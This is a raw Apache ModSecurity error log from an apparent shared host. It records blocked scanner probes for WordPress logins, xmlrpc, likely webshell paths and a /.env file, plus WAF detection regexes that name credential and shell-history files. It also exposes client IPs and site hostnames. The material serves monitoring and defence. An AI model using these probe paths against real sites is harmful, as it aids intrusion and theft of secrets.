[Tue May 26 16:41:40.572833 2026] [security2:error] [pid 823496:tid 823692] [client 89.117.104.6:50580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_7Ja08mrtyBNpA4PDggAAAEA"]
[Tue May 26 16:41:40.572995 2026] [security2:error] [pid 823496:tid 823692] [client 89.117.104.6:50580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_7Ja08mrtyBNpA4PDggAAAEA"]
[Tue May 26 16:41:40.951284 2026] [security2:error] [pid 823496:tid 823748] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/index.php"] [unique_id "ahV_7Ja08mrtyBNpA4PDiAAAAHg"]
[Tue May 26 16:41:40.951684 2026] [security2:error] [pid 823496:tid 823740] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/"] [unique_id "ahV_7Ja08mrtyBNpA4PDhwAAAHA"]
[Tue May 26 16:41:41.202135 2026] [security2:error] [pid 823496:tid 823721] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahV_7Za08mrtyBNpA4PDkQAAAF0"]
[Tue May 26 16:41:41.202563 2026] [security2:error] [pid 823496:tid 823728] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/"] [unique_id "ahV_7Za08mrtyBNpA4PDkAAAAGQ"]
[Tue May 26 16:41:41.417121 2026] [security2:error] [pid 823496:tid 823750] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahV_7Za08mrtyBNpA4PDmgAAAHo"]
[Tue May 26 16:41:41.417527 2026] [security2:error] [pid 823496:tid 823730] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/"] [unique_id "ahV_7Za08mrtyBNpA4PDlgAAAGY"]
[Tue May 26 16:41:41.557933 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:53801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_7Za08mrtyBNpA4PDnAAAAFU"]
[Tue May 26 16:41:41.558071 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:53801] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_7Za08mrtyBNpA4PDnAAAAFU"]
[Tue May 26 16:41:41.683040 2026] [autoindex:error] [pid 823496:tid 823726] [client 89.117.104.6:50584] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:41.683768 2026] [security2:error] [pid 823496:tid 823726] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_7Za08mrtyBNpA4PDoAAAAGI"]
[Tue May 26 16:41:41.992435 2026] [security2:error] [pid 823496:tid 823716] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/wp-admin/index.php"] [unique_id "ahV_7Za08mrtyBNpA4PD4QAAAFg"]
[Tue May 26 16:41:42.188237 2026] [security2:error] [pid 823496:tid 823725] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_65a08mrtyBNpA4PDQAAAAGE"]
[Tue May 26 16:41:42.333101 2026] [security2:error] [pid 823496:tid 823653] [client 62.60.130.233:60305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "420ganjaonline.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV_7pa08mrtyBNpA4PD6gAAABk"], referer: https://www.google.com/
[Tue May 26 16:41:42.393609 2026] [security2:error] [pid 823496:tid 823745] [client 89.117.104.6:50584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_7pa08mrtyBNpA4PD6wAAAHU"]
[Tue May 26 16:41:42.393764 2026] [security2:error] [pid 823496:tid 823745] [client 89.117.104.6:50584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_7pa08mrtyBNpA4PD6wAAAHU"]
[Tue May 26 16:41:42.672993 2026] [security2:error] [pid 823496:tid 823675] [client 62.60.130.233:56572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "420ganjaonline.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahV_7pa08mrtyBNpA4PD7gAAAC8"], referer: https://www.google.com/
[Tue May 26 16:41:42.760063 2026] [autoindex:error] [pid 817651:tid 817872] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:42.760785 2026] [security2:error] [pid 817651:tid 817872] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_7tlGRCPPN1dS2y2rBgAAAOA"]
[Tue May 26 16:41:42.761154 2026] [security2:error] [pid 817651:tid 817825] [client 89.117.104.6:40548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/upgrade/"] [unique_id "ahV_7tlGRCPPN1dS2y2rBQAAALE"]
[Tue May 26 16:41:42.890988 2026] [security2:error] [pid 817651:tid 817834] [client 194.26.192.219:51727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV_7tlGRCPPN1dS2y2rCgAAALo"], referer: www.google.com
[Tue May 26 16:41:42.892113 2026] [security2:error] [pid 823496:tid 823661] [client 194.26.192.219:51654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahV_7pa08mrtyBNpA4PD9QAAACE"], referer: www.google.com
[Tue May 26 16:41:42.907845 2026] [security2:error] [pid 823496:tid 823629] [client 194.26.192.219:50873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahV_7pa08mrtyBNpA4PD9gAAAAE"]
[Tue May 26 16:41:43.062311 2026] [security2:error] [pid 823496:tid 823667] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV_7pa08mrtyBNpA4PD-AAAACc"], referer: https://www.bloggertarget.com
[Tue May 26 16:41:43.447498 2026] [security2:error] [pid 823496:tid 823644] [client 194.26.192.219:65083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV_75a08mrtyBNpA4PEBwAAABA"], referer: www.google.com
[Tue May 26 16:41:43.998100 2026] [security2:error] [pid 817651:tid 817861] [client 194.26.192.219:61929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahV_79lGRCPPN1dS2y2rGwAAANU"]
[Tue May 26 16:41:44.228398 2026] [security2:error] [pid 823496:tid 823692] [client 194.26.192.219:62541] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "me.moes-art.com"] [uri "/index.php"] [unique_id "ahV_7pa08mrtyBNpA4PD9AAAAEA"], referer: www.google.com
[Tue May 26 16:41:44.375371 2026] [security2:error] [pid 823496:tid 823723] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_7Za08mrtyBNpA4PD5QAAAF8"]
[Tue May 26 16:41:44.500577 2026] [security2:error] [pid 823496:tid 823688] [client 194.26.192.219:50885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/rzhfyacr.php"] [unique_id "ahV_8Ja08mrtyBNpA4PEHwAAADw"], referer: www.google.com
[Tue May 26 16:41:44.732064 2026] [security2:error] [pid 823496:tid 823725] [client 194.26.192.219:62541] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "me.moes-art.com"] [uri "/index.php"] [unique_id "ahV_8Ja08mrtyBNpA4PEIgAAAGE"], referer: www.google.com
[Tue May 26 16:41:44.889957 2026] [security2:error] [pid 823496:tid 823733] [client 47.128.21.187:21968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahV_8Ja08mrtyBNpA4PEKQAAAGk"]
[Tue May 26 16:41:45.700308 2026] [security2:error] [pid 823496:tid 823647] [client 194.26.192.219:57744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahV_8Za08mrtyBNpA4PEMgAAABM"], referer: www.google.com
[Tue May 26 16:41:45.831764 2026] [security2:error] [pid 817651:tid 817823] [client 194.26.192.219:52049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahV_8dlGRCPPN1dS2y2rLAAAAK8"]
[Tue May 26 16:41:45.978418 2026] [security2:error] [pid 817651:tid 817818] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_79lGRCPPN1dS2y2rFAAAAKo"]
[Tue May 26 16:41:46.856086 2026] [security2:error] [pid 823496:tid 823655] [client 194.26.192.219:52594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahV_8pa08mrtyBNpA4PEQAAAABs"]
[Tue May 26 16:41:46.898969 2026] [security2:error] [pid 817651:tid 817803] [client 194.26.192.219:49437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/nizlkbql.php"] [unique_id "ahV_8tlGRCPPN1dS2y2rNQAAAJs"], referer: www.google.com
[Tue May 26 16:41:46.933737 2026] [security2:error] [pid 823496:tid 823726] [client 85.208.96.206:11110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahV_8pa08mrtyBNpA4PEQQAAAGI"]
[Tue May 26 16:41:46.933895 2026] [security2:error] [pid 823496:tid 823726] [client 85.208.96.206:11110] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahV_8pa08mrtyBNpA4PEQQAAAGI"]
[Tue May 26 16:41:47.507120 2026] [security2:error] [pid 817651:tid 817782] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_8dlGRCPPN1dS2y2rKAAAAIY"]
[Tue May 26 16:41:47.826839 2026] [security2:error] [pid 823496:tid 823641] [client 194.26.192.219:61152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "me.moes-art.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahV_85a08mrtyBNpA4PEUwAAAA0"]
[Tue May 26 16:41:49.683570 2026] [security2:error] [pid 823496:tid 823677] [client 64.233.173.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahV_9Za08mrtyBNpA4PEawAAADE"]
[Tue May 26 16:41:49.698546 2026] [security2:error] [pid 823496:tid 823673] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_85a08mrtyBNpA4PESAAAAC0"]
[Tue May 26 16:41:50.229665 2026] [security2:error] [pid 823496:tid 823726] [client 114.119.162.58:57307] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/page/2/"] [unique_id "ahV_9pa08mrtyBNpA4PEfgAAAGI"], referer: https://www.jhonweb.com/project/page/2/
[Tue May 26 16:41:50.246575 2026] [security2:error] [pid 823496:tid 823716] [client 168.119.96.239:44200] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV_9pa08mrtyBNpA4PEgQAAAFg"], referer: https://thegoodsporting.com
[Tue May 26 16:41:51.814269 2026] [security2:error] [pid 817651:tid 817879] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_9dlGRCPPN1dS2y2rWAAAAOc"]
[Tue May 26 16:41:51.877715 2026] [security2:error] [pid 817651:tid 817823] [client 117.198.37.168:54256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_99lGRCPPN1dS2y2rdAAAAK8"]
[Tue May 26 16:41:51.877850 2026] [security2:error] [pid 817651:tid 817823] [client 117.198.37.168:54256] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_99lGRCPPN1dS2y2rdAAAAK8"]
[Tue May 26 16:41:53.086785 2026] [security2:error] [pid 823496:tid 823709] [client 62.60.130.233:57787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/wp-login.php"] [unique_id "ahV_-Za08mrtyBNpA4PEoQAAAFE"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 16:41:53.424581 2026] [security2:error] [pid 823496:tid 823695] [client 62.60.130.233:64266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/wp-login.php"] [unique_id "ahV_-Za08mrtyBNpA4PEqgAAAEM"], referer: https://duckduckgo.com/
[Tue May 26 16:41:53.855413 2026] [security2:error] [pid 817651:tid 817891] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_99lGRCPPN1dS2y2rcQAAAPM"]
[Tue May 26 16:41:55.639103 2026] [security2:error] [pid 823496:tid 823685] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_-Za08mrtyBNpA4PEqQAAADk"]
[Tue May 26 16:41:55.824734 2026] [security2:error] [pid 823496:tid 823577] [remote 74.7.241.58:41622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV_-5a08mrtyBNpA4PE1AAAHU4"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/ID3
[Tue May 26 16:41:56.610362 2026] [security2:error] [pid 823496:tid 823714] [client 176.65.139.237:63560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahV__Ja08mrtyBNpA4PE4gAAAFY"]
[Tue May 26 16:41:57.278847 2026] [security2:error] [pid 823496:tid 823697] [client 114.119.144.31:58039] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/destiny-2-afk-script-download.html"] [unique_id "ahV__Za08mrtyBNpA4PE8wAAAEU"], referer: https://planosdesaudeoeste.com.br/carencia-de-plano-de-saude
[Tue May 26 16:41:57.798888 2026] [security2:error] [pid 823496:tid 823735] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_-5a08mrtyBNpA4PE0QAAAGs"]
[Tue May 26 16:41:57.826404 2026] [security2:error] [pid 823496:tid 823644] [client 123.16.146.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_-5a08mrtyBNpA4PE0wAAABA"]
[Tue May 26 16:41:59.547323 2026] [security2:error] [pid 823496:tid 823653] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV__Za08mrtyBNpA4PE8AAAABk"]
[Tue May 26 16:42:01.658737 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV__5a08mrtyBNpA4PFGAAAAHE"]
[Tue May 26 16:42:01.849252 2026] [security2:error] [pid 823496:tid 823702] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAAZa08mrtyBNpA4PFMgAAAEo"], referer: http://anujtradingco.com/homepages/shop-parallax/
